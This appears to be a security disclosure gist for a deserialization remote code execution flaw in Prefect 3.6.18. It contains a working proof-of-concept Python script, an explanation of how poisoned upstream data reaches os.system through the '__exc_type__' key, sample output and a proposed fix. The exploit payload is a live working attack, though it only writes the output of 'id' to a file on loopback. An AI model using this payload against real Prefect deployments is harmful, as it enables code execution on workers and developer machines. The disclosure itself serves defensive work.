Skip to content

Instantly share code, notes, and snippets.

@logicx24
Last active February 20, 2026 20:18
Show Gist options
  • Select an option

  • Save logicx24/aeade82505da5732c7a7f9ab9cde4f99 to your computer and use it in GitHub Desktop.

Select an option

Save logicx24/aeade82505da5732c7a7f9ab9cde4f99 to your computer and use it in GitHub Desktop.
Prefect JSON Deserializer RCE via Second-Order Data Poisoning
#!/usr/bin/env python3
"""
PoC: Prefect Second-Order RCE via External Data Poisoning
Tested against: Prefect 3.6.18
Demonstrates two deserialization paths:
1. Cache hit: second flow run reads cached result -> RCE on worker
2. state.result(): client reads flow run from API -> RCE on client
"""
import json
import os
import shutil
import tempfile
from http.server import HTTPServer, BaseHTTPRequestHandler
from pathlib import Path
from threading import Thread
# Marker files named in the PoC payload's shell redirect; the test functions
# assert on their existence and print their contents.
_MARKER_DIR = Path("/tmp")
RCE_MARKER_CACHE = _MARKER_DIR / "prefect_rce_cache.txt"
RCE_MARKER_STATE = _MARKER_DIR / "prefect_rce_state.txt"

# Loopback port the local PoisonedAPI server binds to.
API_PORT = 9999
class PoisonedAPI(BaseHTTPRequestHandler):
    """HTTP handler standing in for a compromised external data source.

    Every GET is answered with a JSON document whose ``stats`` object carries
    the ``__exc_type__``/``message`` pair this PoC relies on.
    """

    def do_GET(self):
        """Reply 200 with the poisoned JSON body.

        Request paths containing ``"state"`` reference ``RCE_MARKER_STATE``
        in the payload; every other path references ``RCE_MARKER_CACHE``.
        """
        if "state" in self.path:
            marker = RCE_MARKER_STATE
        else:
            marker = RCE_MARKER_CACHE

        poisoned_stats = {"__exc_type__": "os.system", "message": f"id > {marker}"}
        document = {
            "users": [{"id": 1, "name": "Alice"}],
            "stats": poisoned_stats,
        }
        body = json.dumps(document).encode()

        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):
        """Discard the handler's default per-request log output."""
def test_cache_hit_rce():
    """Exercise the cache-hit path: deserialization on the second run.

    The flow is run twice against the same URL. The first run fetches and
    persists the result; the second is expected to be served from cache.
    Afterwards the cache marker file must exist.
    """
    import httpx
    from prefect import flow, task
    from prefect.cache_policies import INPUTS

    # result_serializer="json" auto-enables persist_result=True
    @task(result_serializer="json", cache_policy=INPUTS)
    def fetch_data(url: str):
        response = httpx.get(url, timeout=10)
        return response.json()

    @flow
    def pipeline(url: str):
        return fetch_data(url)

    endpoint = f"http://127.0.0.1:{API_PORT}/api/cache"
    # Iteration 1: fetch + persist. Iteration 2: cache hit -> RCE.
    for _ in range(2):
        pipeline(endpoint)

    assert RCE_MARKER_CACHE.exists(), "Cache path: RCE did not trigger"
    marker_text = RCE_MARKER_CACHE.read_text().strip()
    print(f"[1] Cache hit RCE: {marker_text}")
def test_state_result_rce():
    """Exercise the client-side ``state.result()`` path.

    Runs the flow once, reads the flow run back through the API client, and
    resolves the result of its state. Afterwards the state marker file must
    exist.
    """
    import httpx
    from prefect import flow, task
    from prefect.client.orchestration import get_client

    # result_serializer="json" auto-enables persist_result=True
    @task(result_serializer="json")
    def fetch_data(url: str):
        response = httpx.get(url, timeout=10)
        return response.json()

    @flow(result_serializer="json")
    def pipeline(url: str):
        return fetch_data(url)

    endpoint = f"http://127.0.0.1:{API_PORT}/api/state"
    final_state = pipeline(endpoint, return_state=True)
    run_id = final_state.state_details.flow_run_id

    with get_client(sync_client=True) as client:
        fetched_run = client.read_flow_run(run_id)
        fetched_run.state.result()

    assert RCE_MARKER_STATE.exists(), "state.result() path: RCE did not trigger"
    marker_text = RCE_MARKER_STATE.read_text().strip()
    print(f"[2] state.result() RCE: {marker_text}")
def main():
    """Run both PoC scenarios against a local ``PoisonedAPI`` server.

    Steps:
      1. Remove stale marker files from a previous run.
      2. Point ``PREFECT_LOCAL_STORAGE_PATH`` at a fresh temporary directory.
      3. Serve ``PoisonedAPI`` on ``127.0.0.1:API_PORT`` in a daemon thread.
      4. Run ``test_cache_hit_rce`` and ``test_state_result_rce``.

    All resources are released on exit, including when a scenario raises:
    the serve loop is stopped, the listening socket is closed, the previous
    value of the environment variable is restored, and the marker files and
    temporary storage directory are removed.
    """
    RCE_MARKER_CACHE.unlink(missing_ok=True)
    RCE_MARKER_STATE.unlink(missing_ok=True)

    env_key = "PREFECT_LOCAL_STORAGE_PATH"
    previous_storage = os.environ.get(env_key)
    storage = tempfile.mkdtemp()
    try:
        # Set before the test functions import prefect.
        os.environ[env_key] = storage

        # The context manager calls server_close() on exit, so the listening
        # socket is released even if a scenario fails. Binding happens inside
        # the outer try so a bind failure still removes the temp directory.
        with HTTPServer(("127.0.0.1", API_PORT), PoisonedAPI) as server:
            Thread(target=server.serve_forever, daemon=True).start()
            try:
                test_cache_hit_rce()
                test_state_result_rce()
            finally:
                # Only reached once the serve thread has been started;
                # shutdown() waits for the serve_forever loop to exit.
                server.shutdown()
    finally:
        # Do not leave the process environment pointing at a deleted path.
        if previous_storage is None:
            os.environ.pop(env_key, None)
        else:
            os.environ[env_key] = previous_storage
        RCE_MARKER_CACHE.unlink(missing_ok=True)
        RCE_MARKER_STATE.unlink(missing_ok=True)
        shutil.rmtree(storage, ignore_errors=True)


if __name__ == "__main__":
    main()

Prefect JSON Deserializer RCE via Upstream Data Poisoning

Summary

Prefect's JSON deserializer executes arbitrary callables when it encounters a dictionary containing an __exc_type__ key. An attacker who controls an external data source that a Prefect task fetches can, without any access to Prefect itself, achieve remote code execution on any system that later deserializes the task result.

Vulnerable Code

src/prefect/serializers.py:

def prefect_json_object_decoder(result: dict[str, Any]) -> Any:
    # Used as the JSON object_hook, so it is invoked for every dict in the
    # decoded JSON tree, at any nesting depth.
    if "__class__" in result:
        # ... (branch body elided in this excerpt)
    elif "__exc_type__" in result:
        # Vulnerable line: the "__exc_type__" string is resolved to whatever
        # object that qualified name refers to, and that object is called with
        # "message" as its argument. Neither value is validated.
        return from_qualified_name(result["__exc_type__"])(result["message"])
    else:
        return result

from_qualified_name imports any Python module/attribute. There is no validation on the __exc_type__ value. The object_hook fires on every dict in the JSON tree, so the payload can be nested arbitrarily deep.

Why This Is a Privilege Escalation

Prefect tasks run arbitrary code without a sandbox, so a malicious task author gaining RCE is not a meaningful finding. The issue is that the deserializer treats data as code, which creates privilege escalation across trust boundaries:

  1. An attacker poisons an external data source (API, database, message queue, user-submitted input).
  2. A legitimate task fetches and returns this data. Setting result_serializer="json" (recommended by Prefect for Pydantic compatibility) auto-enables result persistence.
  3. The poisoned result detonates when deserialized in a different security context: a developer's laptop via state.result(), a more-privileged worker on cache hit, or a downstream task.

The attacker doesn't need Prefect access, as the framework converts data from an untrusted source into code execution on a separate, potentially more-privileged machine.

PoC

See attached file. Sample output:

Task run 'fetch_data-b0d' - Finished in state Completed()
Task run 'fetch_data-325' - Finished in state Cached(type=COMPLETED)
Task run 'fetch_data-119' - Finished in state Completed()
[1] Cache hit RCE: uid=1000(devbox) gid=1001(devbox) groups=1001(devbox),27(sudo),1000(docker)
[2] state.result() RCE: uid=1000(devbox) gid=1001(devbox) groups=1001(devbox),27(sudo),1000(docker)

Recommended Fix

Validate __exc_type__ against BaseException subclasses:

elif "__exc_type__" in result:
    cls = from_qualified_name(result["__exc_type__"])
    if not (isinstance(cls, type) and issubclass(cls, BaseException)):
        raise ValueError(f"Invalid exception type: {result['__exc_type__']}")
    return cls(result["message"])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment